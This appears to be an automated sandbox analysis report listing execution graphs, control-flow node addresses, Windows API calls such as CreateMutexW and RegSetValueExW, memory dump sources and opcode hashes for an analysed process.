                                            • Opcode ID: 0381efd580bb2290f02cd9c1e62fec23f8f463d806048dcc1886034d62e4abe1
                                            • Instruction ID: 158d457a7b225ff6ee51f037e59bf46c98e2887d9c6d50f4ac779b028a4cc6f6
                                            • Opcode Fuzzy Hash: 0381efd580bb2290f02cd9c1e62fec23f8f463d806048dcc1886034d62e4abe1
                                            • Instruction Fuzzy Hash: 07C04C36A415359B4F1077F978156DCF354EAD412D704416AD119926019F35812547A2

                                            Execution Graph

                                            Execution Coverage:17.8%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:22
                                            Total number of Limit Nodes:1
                                            execution_graph 1008 148a51a 1009 148a54e GetTokenInformation 1008->1009 1011 148a5c0 1009->1011 1012 148a23c 1013 148a25e CloseHandle 1012->1013 1015 148a298 1013->1015 984 148a25e 985 148a2c9 984->985 986 148a28a CloseHandle 984->986 985->986 987 148a298 986->987 1000 148ab81 1001 148abb2 RegQueryValueExW 1000->1001 1003 148ac3b 1001->1003 1004 148ac82 1006 148aca6 RegSetValueExW 1004->1006 1007 148ad27 1006->1007 1016 148ae32 1017 148ae66 CreateMutexW 1016->1017 1019 148aee1 1017->1019 992 148ae66 993 148ae9e CreateMutexW 992->993 995 148aee1 993->995

                                            Callgraph

                                            • Executed
                                            • Not Executed
                                            • Opacity -> Relevance
                                            • Disassembly available
                                            callgraph 0 Function_0148A54E 1 Function_01A005AC 2 Function_01A0072C 1->2 11 Function_01A40606 1->11 36 Function_01A405E7 1->36 41 Function_01A4026D 1->41 65 Function_01A005D1 1->65 3 Function_0148A844 4 Function_0148A646 5 Function_01482458 6 Function_0148A25E 7 Function_014820D0 8 Function_01A0093D 9 Function_0148A7D6 10 Function_0148A2D7 12 Function_0148A46A 13 Function_01A40000 14 Function_0148A86E 15 Function_01A00006 16 Function_0148AD60 17 Function_01482264 18 Function_01482364 19 Function_0148AE66 20 Function_0148A078 21 Function_01A00A92 22 Function_0148AAFC 23 Function_0148AC7C 24 Function_0148A6FD 25 Function_01A40713 26 Function_0148257F 27 Function_014821F0 28 Function_01A0089A 29 Function_0148A172 30 Function_014823F4 31 Function_0148A1F4 32 Function_01A00360 32->2 32->11 32->36 32->41 32->65 33 Function_0148A988 34 Function_0148A30A 35 Function_01A40666 37 Function_0148A60B 38 Function_0148268D 39 Function_0148AD8E 40 Function_0148A380 42 Function_0148AB81 43 Function_0148AA82 44 Function_0148AC82 45 Function_0148A005 46 Function_01A4066A 47 Function_01482006 48 Function_01A40074 49 Function_01A00370 49->2 49->11 49->36 49->41 49->65 50 Function_01482098 51 Function_0148A09A 52 Function_0148A51A 53 Function_0148AB1E 54 Function_01A4067F 55 Function_01482194 56 Function_0148A4AA 57 Function_0148A7AA 58 Function_01A40740 59 Function_0148A02E 60 Function_0148A120 61 Function_01A405C8 62 Function_0148A3A6 63 Function_0148ACA6 64 Function_0148AA38 66 Function_014823BC 67 Function_0148213C 68 Function_0148A23C 69 Function_01A40053 70 Function_01482430 71 Function_01482531 72 Function_0148A9B2 73 Function_0148ABB2 74 Function_0148AE32 75 Function_01A405D8 76 Function_0148A736

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 372 1a00360-1a00392 373 1a0039d-1a003ab 372->373 375 1a003b5-1a003b7 373->375 376 1a003c1-1a003dd 375->376 378 1a003e4-1a003f3 376->378 379 1a003fa-1a0047f 378->379 390 1a00489-1a004a1 379->390 392 1a004ac-1a004ec 390->392 397 1a004f3-1a00502 392->397 398 1a00509-1a0058e 397->398 409 1a00598-1a005bd 398->409 413 1a005bd call 1a005d1 409->413 414 1a005bd call 1a40606 409->414 415 1a005bd call 1a405e7 409->415 416 1a005bd call 1a4026d 409->416 417 1a005bd call 1a0072c 409->417 412 1a005c3-1a005ca 413->412 414->412 415->412 416->412 417->412
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2880333270.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1a00000_Windows.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6b8eebcbf31a813e13764281c7a89b91f9dacdb7c14976105e17a8a8efb68da3
                                            • Instruction ID: 0ca1c9bad2b0d81ad713ed254490b168b9c8fad65c87d31f20218097fafe4ecd
                                            • Opcode Fuzzy Hash: 6b8eebcbf31a813e13764281c7a89b91f9dacdb7c14976105e17a8a8efb68da3
                                            • Instruction Fuzzy Hash: 9C511531B00201ABEF58EB719C11BAE3AA3EBD5354F254138A205DB3E4DE799D11D391
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2880333270.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1a00000_Windows.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 80c76a60164c4264d45726f6cd0460126a4aa283722b5f256683f0701de5b550
                                            • Instruction ID: a4bbc8cbd1905fd8043e824a2eccf7324e43e4b55aa79c2f5cec9a0acba39394
                                            • Opcode Fuzzy Hash: 80c76a60164c4264d45726f6cd0460126a4aa283722b5f256683f0701de5b550
                                            • Instruction Fuzzy Hash: F551E331B00105ABEF18EB719C11B6E3AA3EBD5354F254138A205DB3E4DE79AD15D3A1

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 148ae32-148aeb5 4 148aeba-148aec3 0->4 5 148aeb7 0->5 6 148aec8-148aed1 4->6 7 148aec5 4->7 5->4 8 148af22-148af27 6->8 9 148aed3-148aef7 CreateMutexW 6->9 7->6 8->9 12 148af29-148af2e 9->12 13 148aef9-148af1f 9->13 12->13
                                            APIs
                                            • CreateMutexW.KERNELBASE(?,?), ref: 0148AED9
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2879593182.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_148a000_Windows.jbxd
                                            Similarity
                                            • API ID: CreateMutex
                                            • String ID:
                                            • API String ID: 1964310414-0
                                            • Opcode ID: 35702f1fe325309210b17ea8c28c3307f0485def6cb16750faf97b69d96d73b3
                                            • Instruction ID: 8e401be776823a7bc39a34d83f53a4cb804254cf061b64b1798349effe0fd65d
                                            • Opcode Fuzzy Hash: 35702f1fe325309210b17ea8c28c3307f0485def6cb16750faf97b69d96d73b3
                                            • Instruction Fuzzy Hash: C831A1B15093806FE722CB25CC85B96BFF8EF06314F08849BE9448B292D374E809C761

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 16 148a51a-148a5b0 21 148a5fd-148a602 16->21 22 148a5b2-148a5ba GetTokenInformation 16->22 21->22 23 148a5c0-148a5d2 22->23 25 148a604-148a609 23->25 26 148a5d4-148a5fa 23->26 25->26
                                            APIs
                                            • GetTokenInformation.KERNELBASE(?,00000E24,0CEB1A46,00000000,00000000,00000000,00000000), ref: 0148A5B8
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2879593182.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_148a000_Windows.jbxd
                                            Similarity
                                            • API ID: InformationToken
                                            • String ID:
                                            • API String ID: 4114910276-0
                                            • Opcode ID: c79165b7d1e7093ecc810a9318f586e8c755b4cc405e414dad53ee4f0c174da1
                                            • Instruction ID: eaf79a2fbfd0fc7c97985552a739bfb84606432a730de21af1ac532791f95313
                                            • Opcode Fuzzy Hash: c79165b7d1e7093ecc810a9318f586e8c755b4cc405e414dad53ee4f0c174da1
                                            • Instruction Fuzzy Hash: E231B1715093806FD7228B60CC54FA7BFB8AF16314F08849BE985CB162D264E908C772

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 29 148ab81-148abef 32 148abf1 29->32 33 148abf4-148abfd 29->33 32->33 34 148abff 33->34 35 148ac02-148ac08 33->35 34->35 36 148ac0a 35->36 37 148ac0d-148ac24 35->37 36->37 39 148ac5b-148ac60 37->39 40 148ac26-148ac39 RegQueryValueExW 37->40 39->40 41 148ac3b-148ac58 40->41 42 148ac62-148ac67 40->42 42->41
                                            APIs
                                            • RegQueryValueExW.KERNELBASE(?,00000E24,0CEB1A46,00000000,00000000,00000000,00000000), ref: 0148AC2C
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2879593182.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_148a000_Windows.jbxd
                                            Similarity
                                            • API ID: QueryValue
                                            • String ID:
                                            • API String ID: 3660427363-0
                                            • Opcode ID: a6aff9d30e48699b705548219676e07fecf34e98dcc8cb1e32c66ac878fb23da
                                            • Instruction ID: d94a7fc15391256e3de685b3294531a9d4a845cb22c4ecf41f617e19170c1757
                                            • Opcode Fuzzy Hash: a6aff9d30e48699b705548219676e07fecf34e98dcc8cb1e32c66ac878fb23da
                                            • Instruction Fuzzy Hash: A0317C75505780AFE722CF15CC84F97BFB8EF16610F08849BE9458B2A2D364E908CB61

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 46 148ac82-148ace3 49 148ace8-148acf4 46->49 50 148ace5 46->50 51 148acf9-148ad10 49->51 52 148acf6 49->52 50->49 54 148ad12-148ad25 RegSetValueExW 51->54 55 148ad47-148ad4c 51->55 52->51 56 148ad4e-148ad53 54->56 57 148ad27-148ad44 54->57 55->54 56->57
                                            APIs
                                            • RegSetValueExW.KERNELBASE(?,00000E24,0CEB1A46,00000000,00000000,00000000,00000000), ref: 0148AD18
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2879593182.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_148a000_Windows.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: c80ef6ffa8cf4c28208c3d1374b9f15ebd904bffea095f843a141fcf7ae2fd2d
                                            • Instruction ID: 757fb6cec6396574cdd53191600d9fa64dfa48959f9b66a4c3c7cf78c037f1d4
                                            • Opcode Fuzzy Hash: c80ef6ffa8cf4c28208c3d1374b9f15ebd904bffea095f843a141fcf7ae2fd2d
                                            • Instruction Fuzzy Hash: AA2190725053806FDB228F15CC44FA7BFB8EF56610F18849BE985DB662D274E848C771

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 61 148ae66-148aeb5 64 148aeba-148aec3 61->64 65 148aeb7 61->65 66 148aec8-148aed1 64->66 67 148aec5 64->67 65->64 68 148af22-148af27 66->68 69 148aed3-148aedb CreateMutexW 66->69 67->66 68->69 70 148aee1-148aef7 69->70 72 148af29-148af2e 70->72 73 148aef9-148af1f 70->73 72->73
                                            APIs
                                            • CreateMutexW.KERNELBASE(?,?), ref: 0148AED9
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2879593182.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_148a000_Windows.jbxd
                                            Similarity
                                            • API ID: CreateMutex
                                            • String ID:
                                            • API String ID: 1964310414-0
                                            • Opcode ID: 8a65f18abb890ead4d323f662d4925fa4427aae4df9ef43520d49252770f71a5
                                            • Instruction ID: 6a3cb5b6ac4b5201e5066e1e471b8d2beb0fa784e2be316f28f471dfb4f77599
                                            • Opcode Fuzzy Hash: 8a65f18abb890ead4d323f662d4925fa4427aae4df9ef43520d49252770f71a5
                                            • Instruction Fuzzy Hash: 3B21D7715002009FEB21DF25CC45BAAFBE8EF14324F14885BED488B791D774E409CA71

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 76 148a54e-148a5b0 80 148a5fd-148a602 76->80 81 148a5b2-148a5ba GetTokenInformation 76->81 80->81 82 148a5c0-148a5d2 81->82 84 148a604-148a609 82->84 85 148a5d4-148a5fa 82->85 84->85
                                            APIs
                                            • GetTokenInformation.KERNELBASE(?,00000E24,0CEB1A46,00000000,00000000,00000000,00000000), ref: 0148A5B8
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2879593182.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_148a000_Windows.jbxd
                                            Similarity
                                            • API ID: InformationToken
                                            • String ID:
                                            • API String ID: 4114910276-0
                                            • Opcode ID: 5118c765eae4786a26f92259858d938c92ec4c83c547fb260ca83fb8f513b9bb
                                            • Instruction ID: f4d77fafffcdee7579fe9b7213754ab613cd73079a34d01a987e7de18cc39bf2
                                            • Opcode Fuzzy Hash: 5118c765eae4786a26f92259858d938c92ec4c83c547fb260ca83fb8f513b9bb
                                            • Instruction Fuzzy Hash: 2611C072500204AFEB21DF55CC44FABB7ACEF24724F14846BE949CB651D774E4488BB1

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 88 148abb2-148abef 90 148abf1 88->90 91 148abf4-148abfd 88->91 90->91 92 148abff 91->92 93 148ac02-148ac08 91->93 92->93 94 148ac0a 93->94 95 148ac0d-148ac24 93->95 94->95 97 148ac5b-148ac60 95->97 98 148ac26-148ac39 RegQueryValueExW 95->98 97->98 99 148ac3b-148ac58 98->99 100 148ac62-148ac67 98->100 100->99
                                            APIs
                                            • RegQueryValueExW.KERNELBASE(?,00000E24,0CEB1A46,00000000,00000000,00000000,00000000), ref: 0148AC2C
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2879593182.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_148a000_Windows.jbxd
                                            Similarity
                                            • API ID: QueryValue
                                            • String ID:
                                            • API String ID: 3660427363-0
                                            • Opcode ID: 1d1c6caea2345f139c01e4f82bcdc528af2343008cbf3ef048ecf7377e2a1e8c
                                            • Instruction ID: 8a7261acaae5b9dc72f7e5e6299ba4be8fbd3cea8cba74bc017108b1210dfec0
                                            • Opcode Fuzzy Hash: 1d1c6caea2345f139c01e4f82bcdc528af2343008cbf3ef048ecf7377e2a1e8c
                                            • Instruction Fuzzy Hash: 71216F756002049FE721DF15CC85FABBBECEF14614F18845BE9498B761D770E808CA71

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 104 148aca6-148ace3 106 148ace8-148acf4 104->106 107 148ace5 104->107 108 148acf9-148ad10 106->108 109 148acf6 106->109 107->106 111 148ad12-148ad25 RegSetValueExW 108->111 112 148ad47-148ad4c 108->112 109->108 113 148ad4e-148ad53 111->113 114 148ad27-148ad44 111->114 112->111 113->114
                                            APIs
                                            • RegSetValueExW.KERNELBASE(?,00000E24,0CEB1A46,00000000,00000000,00000000,00000000), ref: 0148AD18
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2879593182.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_148a000_Windows.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: b146534400cebe75f112a59476cae758e24a32d9e4092833eb5f59c096bdfdef
                                            • Instruction ID: f24876bcf0567e29d52c1c738d7e50c26f782e7648c7bfd047dcd22150dbe226
                                            • Opcode Fuzzy Hash: b146534400cebe75f112a59476cae758e24a32d9e4092833eb5f59c096bdfdef
                                            • Instruction Fuzzy Hash: 1E11AC72600200AFEB319E15CC41FABBBECEF24614F14845BED458B762D7B1E409CAB1

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 118 148a23c-148a288 120 148a2c9-148a2ce 118->120 121 148a28a-148a2aa CloseHandle 118->121 120->121 124 148a2ac-148a2c8 121->124 125 148a2d0-148a2d5 121->125 125->124
                                            APIs
                                            • CloseHandle.KERNELBASE(?), ref: 0148A290
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2879593182.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_148a000_Windows.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: 4d9960f38b3252dc79b998d6a871bd5688985271e8c795a68a6a5007c56ae2e7
                                            • Instruction ID: 0bb00a0a5ce93eddcd558461d30ceadb5d93a8b1310a9723a508264f55e9d579
                                            • Opcode Fuzzy Hash: 4d9960f38b3252dc79b998d6a871bd5688985271e8c795a68a6a5007c56ae2e7
                                            • Instruction Fuzzy Hash: EE11A7715093809FDB12CF25DC95B56BFB4DF46220F0884DBED458F663D275A808CB62

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 127 148a25e-148a288 128 148a2c9-148a2ce 127->128 129 148a28a-148a292 CloseHandle 127->129 128->129 130 148a298-148a2aa 129->130 132 148a2ac-148a2c8 130->132 133 148a2d0-148a2d5 130->133 133->132
                                            APIs
                                            • CloseHandle.KERNELBASE(?), ref: 0148A290
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2879593182.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_148a000_Windows.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: 3ba8248a72d4009b5db67c0b2234e46802b56635597a03afaac598bcbc0c78ef
                                            • Instruction ID: fc6bf89ebfb80002721bf9ad43e03222e2435baa93a63091f75f0644d4e4f116
                                            • Opcode Fuzzy Hash: 3ba8248a72d4009b5db67c0b2234e46802b56635597a03afaac598bcbc0c78ef
                                            • Instruction Fuzzy Hash: 2801D471A042408FDB20DF55D88576AFBD4DF05220F18C4ABDD098F762D2B5E404CA62

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 135 1a4026d-1a405b1 137 1a40626-1a40643 135->137 138 1a405b3-1a405be 135->138 138->137
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2880379039.0000000001A40000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1a40000_Windows.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4719b04bb62ea5c3b38f1035fa5ace514cfbf2a00909995651bb186bb6b0d015
                                            • Instruction ID: fcf5a18ee2d2bdfbdc105dd01ac66eeb95e047e5dcd7515d76308cb2dd6f4963
                                            • Opcode Fuzzy Hash: 4719b04bb62ea5c3b38f1035fa5ace514cfbf2a00909995651bb186bb6b0d015
                                            • Instruction Fuzzy Hash: 2021776654E3C04FD3039B356D252A07FB09E93125B1E41EBD5C9CE1A3E11A590ED7A3

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 140 1a005d1-1a006a2 152 1a006b9-1a006bd 140->152 153 1a006a4-1a006b4 152->153 154 1a006bf 152->154 158 1a006c1-1a006ea 153->158 159 1a006b6 153->159 155 1a006ec-1a006f3 154->155 160 1a006f5-1a00765 155->160 161 1a0076f-1a007ac 155->161 158->155 159->152 160->161 173 1a007b3-1a007c0 161->173 174 1a007ae 161->174 176 1a007c2-1a007ec 173->176 177 1a007f7-1a00858 173->177 174->173 176->177 187 1a008d3-1a008e4 177->187 188 1a0085a-1a00898 177->188 191 1a008e6-1a008ec 187->191 192 1a008ef-1a008fa 187->192 188->187 191->192 195 1a00900-1a00907 192->195 196 1a00bce-1a00c0a 192->196 198 1a00976-1a0097a 195->198 199 1a00909-1a0093b 195->199 208 1a00c0c 196->208 201 1a0097c-1a00999 198->201 202 1a009bd-1a009c4 198->202 199->198 201->202 216 1a0099b-1a009b5 201->216 204 1a009ca-1a00a3e 202->204 205 1a00bcc 202->205 225 1a00a90-1a00b3f 204->225 226 1a00a40-1a00a89 204->226 205->208 216->202 237 1a00b91 225->237 238 1a00b41-1a00b8a 225->238 226->225 237->205 238->237
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2880333270.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1a00000_Windows.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 23e122204e8f6ccb6afb88f18466951339a8da51edec0df0c6a1dc2d57cc9f96
                                            • Instruction ID: 87a4ecb313954ebea4e5e7a64729dd94f6c4f6a8a4ded987df8b60ec8400d9b0
                                            • Opcode Fuzzy Hash: 23e122204e8f6ccb6afb88f18466951339a8da51edec0df0c6a1dc2d57cc9f96
                                            • Instruction Fuzzy Hash: 33E14430A01258CFEB15DB74D941BADBBB2FB89308F1044A9E506AB3A4DB399C95CF50

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 242 1a0072c-1a007ac 253 1a007b3-1a007c0 242->253 254 1a007ae 242->254 256 1a007c2-1a007ec 253->256 257 1a007f7-1a00858 253->257 254->253 256->257 267 1a008d3-1a008e4 257->267 268 1a0085a-1a00898 257->268 271 1a008e6-1a008ec 267->271 272 1a008ef-1a008fa 267->272 268->267 271->272 275 1a00900-1a00907 272->275 276 1a00bce-1a00c0a 272->276 278 1a00976-1a0097a 275->278 279 1a00909-1a0093b 275->279 288 1a00c0c 276->288 281 1a0097c-1a00999 278->281 282 1a009bd-1a009c4 278->282 279->278 281->282 296 1a0099b-1a009b5 281->296 284 1a009ca-1a00a3e 282->284 285 1a00bcc 282->285 305 1a00a90-1a00b3f 284->305 306 1a00a40-1a00a89 284->306 285->288 296->282 317 1a00b91 305->317 318 1a00b41-1a00b8a 305->318 306->305 317->285 318->317
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2880333270.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1a00000_Windows.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cf152d6c6603c2fa98bf7bf51c72762d8ae27a590dccd5e7099bbc629b586c6a
                                            • Instruction ID: d8bcf9437e0ea87a1e91f6e91bce4158f4c0cc1183c6ddf01da3c5474a183b6a
                                            • Opcode Fuzzy Hash: cf152d6c6603c2fa98bf7bf51c72762d8ae27a590dccd5e7099bbc629b586c6a
                                            • Instruction Fuzzy Hash: C1A13430A01258CFEB25DF74D951BADBBB2FB89308F1044A9E505AB3A4DB399D91CF50

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 322 1a00006-1a00015 323 1a00017-1a00078 322->323 324 1a0007e-1a0026e 322->324 323->324 356 1a00278-1a00358 324->356
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2880333270.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1a00000_Windows.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1e5c28e226eb13a28acbbbf9e0a0d7e09ac2cf9c6863e42955329a42c6f1b628
                                            • Instruction ID: 7fa07277b4ab61c489c6d16797d829f401a61d0afd73b948dee871ab5cce3908
                                            • Opcode Fuzzy Hash: 1e5c28e226eb13a28acbbbf9e0a0d7e09ac2cf9c6863e42955329a42c6f1b628
                                            • Instruction Fuzzy Hash: B381823090A382CFD301DF34E45099A7FF2FFA5208B0185A9E1448B76ADB7C9D69DB91
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2880379039.0000000001A40000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1a40000_Windows.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5551fb49edaf15f11b9e58c03cb2c2f1338d37af491bb33db2f40248719818eb
                                            • Instruction ID: 7e52da6c7b480acc29e47582515dec55355a339f2c1f420be4a5db1640247a42
                                            • Opcode Fuzzy Hash: 5551fb49edaf15f11b9e58c03cb2c2f1338d37af491bb33db2f40248719818eb
                                            • Instruction Fuzzy Hash: CBF044B65097806FD7118F16AC45863FFA8EB86630709C49FEC498B652D265B908CB72
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2880379039.0000000001A40000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1a40000_Windows.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 592fba91a4321b32b080942f9f06e4ce2d7090174125d34f622b8e01930e0369
                                            • Instruction ID: 0e4824788494421b2850a0bd4770646820ac93a8693d4f0ced8c4ab90f97c34b
                                            • Opcode Fuzzy Hash: 592fba91a4321b32b080942f9f06e4ce2d7090174125d34f622b8e01930e0369
                                            • Instruction Fuzzy Hash: 5CE092B6A016004B9750CF0AEC81462F7D8EB84A30708C47FDC0D8B711D279B508CAA5
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2879553067.0000000001482000.00000040.00000800.00020000.00000000.sdmp, Offset: 01482000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1482000_Windows.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4e3b6d9c4221caf5853ecdb0004c92b7bbe47d54f71d431cec008dac5630b6a3
                                            • Instruction ID: a5f03f16e2eb32d75c994cdd07bd8add965acc520d7f2ae4f54efee665a9653c
                                            • Opcode Fuzzy Hash: 4e3b6d9c4221caf5853ecdb0004c92b7bbe47d54f71d431cec008dac5630b6a3
                                            • Instruction Fuzzy Hash: F4D05E792056D14FE316AA1CC1A8F9A3BE4AB61B14F4A44FAA8008B773C7A8D581D610
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2879553067.0000000001482000.00000040.00000800.00020000.00000000.sdmp, Offset: 01482000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1482000_Windows.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e333d7939724697ad08696ffe6f14003a42327d000467a55c9b935633e277930
                                            • Instruction ID: 30e52d7bde67e7d680419290f7be0479767a01e920ab6786399580379f6132f9
                                            • Opcode Fuzzy Hash: e333d7939724697ad08696ffe6f14003a42327d000467a55c9b935633e277930
                                            • Instruction Fuzzy Hash: B0D05E342002814BD716EA1CC6E4F5E3BD4AB50B14F0644E9BC108B772C7B4D9C5CA00
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2880333270.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1a00000_Windows.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1c36bce20fe7e3b3e0ec2d1050d48276efe41c02647559f0cedce79d3ea31f06
                                            • Instruction ID: dcb614856b39bccb0582c07371ecb721f6066a2915598de8e8c9f608a3d17827
                                            • Opcode Fuzzy Hash: 1c36bce20fe7e3b3e0ec2d1050d48276efe41c02647559f0cedce79d3ea31f06
                                            • Instruction Fuzzy Hash: 83C02B37B400358B4F1037F970052DCF310EED402D704002BC128821008F34801847F3